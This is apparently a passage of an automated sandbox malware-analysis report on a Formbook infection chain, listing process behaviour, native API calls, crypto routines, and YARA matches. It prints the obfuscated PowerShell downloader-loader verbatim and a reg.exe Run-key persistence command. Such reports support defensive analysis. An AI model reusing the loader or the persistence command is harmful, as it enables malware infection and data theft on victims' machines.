oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior

Abnormal high CPU Usage

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	17_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00401806 NtdllDefWindowProc_W,	17_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004018C0 NtdllDefWindowProc_W,	17_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004016FD NtdllDefWindowProc_A,	18_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004017B7 NtdllDefWindowProc_A,	18_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00402CAC NtdllDefWindowProc_A,	19_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00402D66 NtdllDefWindowProc_A,	19_2_00402D66
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC35C0 NtCreateMutant,LdrInitializeThunk,	26_2_21CC35C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2B60 NtClose,LdrInitializeThunk,	26_2_21CC2B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,	26_2_21CC2DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,	26_2_21CC2C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3090 NtSetValueKey,	26_2_21CC3090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3010 NtOpenDirectoryObject,	26_2_21CC3010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC4340 NtSetContextThread,	26_2_21CC4340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC4650 NtSuspendThread,	26_2_21CC4650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC39B0 NtGetContextThread,	26_2_21CC39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2BE0 NtQueryValueKey,	26_2_21CC2BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2BF0 NtAllocateVirtualMemory,	26_2_21CC2BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2B80 NtQueryInformationFile,	26_2_21CC2B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2BA0 NtEnumerateValueKey,	26_2_21CC2BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2AD0 NtReadFile,	26_2_21CC2AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2AF0 NtWriteFile,	26_2_21CC2AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2AB0 NtWaitForSingleObject,	26_2_21CC2AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2DD0 NtDelayExecution,	26_2_21CC2DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2DB0 NtEnumerateKey,	26_2_21CC2DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3D70 NtOpenThread,	26_2_21CC3D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2D00 NtSetInformationFile,	26_2_21CC2D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3D10 NtOpenProcessToken,	26_2_21CC3D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2D10 NtMapViewOfSection,	26_2_21CC2D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2D30 NtUnmapViewOfSection,	26_2_21CC2D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2CC0 NtQueryVirtualMemory,	26_2_21CC2CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2CF0 NtOpenProcess,	26_2_21CC2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2CA0 NtQueryInformationToken,	26_2_21CC2CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2C60 NtCreateKey,	26_2_21CC2C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2C00 NtQueryInformationProcess,	26_2_21CC2C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2FE0 NtCreateFile,	26_2_21CC2FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2F90 NtProtectVirtualMemory,	26_2_21CC2F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2FA0 NtQuerySection,	26_2_21CC2FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2FB0 NtResumeThread,	26_2_21CC2FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2F60 NtCreateProcessEx,	26_2_21CC2F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2F30 NtCreateSection,	26_2_21CC2F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2EE0 NtQueueApcThread,	26_2_21CC2EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2E80 NtReadVirtualMemory,	26_2_21CC2E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2EA0 NtAdjustPrivilegesToken,	26_2_21CC2EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2E30 NtWriteVirtualMemory,	26_2_21CC2E30

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B70BE92	2_2_00007FFD9B70BE92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B70B0E6	2_2_00007FFD9B70B0E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B706E6D	2_2_00007FFD9B706E6D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468EF68	5_2_0468EF68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468F838	5_2_0468F838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468EC20	5_2_0468EC20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0747C998	5_2_0747C998
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D7B5C1	10_2_23D7B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D87194	10_2_23D87194
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044B040	17_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0043610D	17_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00447310	17_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044A490	17_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040755A	17_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0043C560	17_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044B610	17_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044D6C0	17_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004476F0	17_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044B870	17_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044081D	17_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00414957	17_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004079EE	17_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00407AEB	17_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044AA80	17_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00412AA9	17_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404B74	17_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404B03	17_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044BBD8	17_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404BE5	17_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404C76	17_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00415CFE	17_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00416D72	17_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00446D30	17_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00446D8B	17_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00406E8F	17_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00405038	18_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0041208C	18_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004050A9	18_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0040511A	18_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0043C13A	18_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004051AB	18_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00449300	18_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0040D322	18_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044A4F0	18_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0043A5AB	18_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00413631	18_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00446690	18_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044A730	18_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004398D8	18_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004498E0	18_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044A886	18_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0043DA09	18_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00438D5E	18_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00449ED0	18_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0041FE83	18_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00430F54	18_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004050C2	19_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004014AB	19_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00405133	19_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004051A4	19_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00401246	19_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040CA46	19_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00405235	19_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004032C8	19_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00401689	19_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00402F60	19_2_00402F60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0482F488	20_2_0482F488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0482F140	20_2_0482F140
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D481CC	26_2_21D481CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9B1B0	26_2_21C9B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D501AA	26_2_21D501AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D18158	26_2_21D18158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC516C	26_2_21CC516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D5B16B	26_2_21D5B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C80100	26_2_21C80100
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F0CC	26_2_21D3F0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4F0E0	26_2_21D4F0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D470E9	26_2_21D470E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D503E6	26_2_21D503E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD739A	26_2_21CD739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D34C	26_2_21C7D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4132D	26_2_21D4132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D50591	26_2_21D50591
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2D5B0	26_2_21D2D5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D47571	26_2_21D47571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3E4F6	26_2_21D3E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D42446	26_2_21D42446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4F43F	26_2_21D4F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4F7B0	26_2_21D4F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB4750	26_2_21CB4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90770	26_2_21C90770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D416CC	26_2_21D416CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAC6E0	26_2_21CAC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C95990	26_2_21C95990
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C929A0	26_2_21C929A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D5A9A6	26_2_21D5A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C99950	26_2_21C99950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB950	26_2_21CAB950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA6962	26_2_21CA6962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C938E0	26_2_21C938E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE8F0	26_2_21CBE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C768B8	26_2_21C768B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C92840	26_2_21C92840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9A840	26_2_21C9A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD800	26_2_21CFD800
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D46BD7	26_2_21D46BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D05BF0	26_2_21D05BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CCDBF9	26_2_21CCDBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4AB40	26_2_21D4AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3DAC6	26_2_21D3DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8EA80	26_2_21C8EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD5AA0	26_2_21CD5AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2DAAC	26_2_21D2DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D47A46	26_2_21D47A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FA49	26_2_21D4FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D03A6C	26_2_21D03A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAFDC0	26_2_21CAFDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8ADE0	26_2_21C8ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA8DBF	26_2_21CA8DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D41D5A	26_2_21D41D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D47D73	26_2_21D47D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9AD00	26_2_21C9AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FCF2	26_2_21D4FCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C80CF2	26_2_21C80CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30CB5	26_2_21D30CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9EC60	26_2_21C9EC60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82FC8	26_2_21C82FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C91F92	26_2_21C91F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FFB1	26_2_21D4FFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0EFA0	26_2_21D0EFA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D04F40	26_2_21D04F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FF09	26_2_21D4FF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD2F28	26_2_21CD2F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB0F30	26_2_21CB0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4EEDB	26_2_21D4EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4CE93	26_2_21D4CE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA2E90	26_2_21CA2E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C99EB0	26_2_21C99EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90E5B	26_2_21C90E5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4EE26	26_2_21D4EE26

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21CD7E54 appears 88 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21C7B970 appears 220 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21CC5130 appears 34 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21CFEA12 appears 81 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21D0F290 appears 98 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00416760 appears 69 times

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"

Yara signature match

Source: amsi32_7860.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_8084.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
